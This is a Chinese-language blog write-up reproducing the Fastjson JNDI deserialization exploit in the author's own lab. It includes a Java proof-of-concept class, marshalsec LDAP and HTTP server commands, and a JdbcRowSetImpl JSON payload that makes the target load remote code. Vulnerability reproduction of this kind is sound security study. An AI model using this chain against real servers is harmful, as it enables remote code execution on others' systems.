记一次FastJson漏洞的复现
前言
Fastjson最经典的反序列漏洞是在1.2.24版本时,当时可以利用的主流方式有两种。
1.JNDI注入利用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中的_bytecodes属性进行整个恶意类的反序列化。
2.利用rmi或者ldap让服务器远程调用恶意类进行利用。
第一种方式fastjosn默认不会反序列私有属性,需要在反序列化时设置Feature.SupportNonPublicField这种方式才可以利用成功。
由于第一种方式受限制较多,很多情况下不会设置Feature.SupportNonPublicField,所以我们直接模拟下第二种方式。
准备事项
Python 2.7
Java jdk 1.8.0_101
marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务
springboot简单的代码准备
模拟服务端的准备(被攻击方)
一个超级简单的springboo服务,使用官方生成一个demo即可 https://start.spring.io/
加入fastjson的jar包,版本可以换,我特地用了一个比较低的版本
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.20</version>
</dependency>
加入一个简单的Controller
@RequestMapping("/hello")
public String say(@RequestBody String username) {
System.out.println(username);
Object Nuset=JSON.parseObject(username);
return "hello,this is a springboot demo!~";
}
相当简单代码,接收参数,然后使用FastJson的parseObject去解析.到这里一个简单的模拟服务端完成.直接springboot启动即可.我实在本地启动,我是一台windows的开发机.
攻击准备
这里我用我的腾讯云主机作为rmi或ldap服务的发布方.
首先下载marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务,这是一个java的 maven项目 下载后 直接install 得到 jar包,上传到腾讯云主机服务器.
攻击代码准备
import java.lang.Runtime;
import java.lang.Process;
public class FastjsonPOC {
static {
try {
//因为模拟服务在本地的windows主机启动,所以,执行打开计算器的操作,模拟攻击者要做的事情
Process process = Runtime.getRuntime().exec("calc.exe");
process.waitFor();
} catch (Exception e) {
}
}
}
将此代码本地编译后得到class文件,既FastjsonPOC.class,上传到上传到腾讯云主机服务器.
防火墙放开9090和9091端口
自带的python开始9090的http端口
python -m SimpleHTTPServer 9090
执行以下命令(jdk我就默认你有了哈!)开启rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xxx.xxx:9090/#FastjsonPOC 9091
开干
好了,万事俱备了......
用PostMan或其他http模拟工具,朝模拟服务端的接口发送以下报文:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xx.xx.xxx.xxx:9091/FastjsonPOC",
"autoCommit":true
}
}
可以看到计算器被打开了.............
结语
凶残!!!!!!!!!!!!!,以前写代码时,没注意这些漏洞提示,现在真实的体验到了,就两个字,凶残.......漏洞修复要及时才行啊!
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- python 在右键菜单中加入复制目标文件的有效存放路径(单斜杠或者双反斜杠)
- 前端多线程大文件下载实践,提速10倍(拿捏百度云盘)
- docker 中的mysql 经常重启优化
- python MultipartEncoder传输zip文件实例
- 当Flutter遇到节流与防抖的思路和流程优化
- 花样使用Handler与源码分析
- 几个你不知道的Git小命令,却收获快乐。
- Flutter路由的跳转、动画和传参详解(最简单)
- ObjectAnimator属性动画源码分析篇
- 谈谈 React 5种最流行的状态管理库
- Android动态时钟壁纸开发
- Python读取配置文件(config.ini)以及写入配置文件
- Django {{ MEDIA_URL }}无法显示图片的解决方式
- python将音频进行变速的操作方法
- 解决django的template中如果无法引用MEDIA_URL问题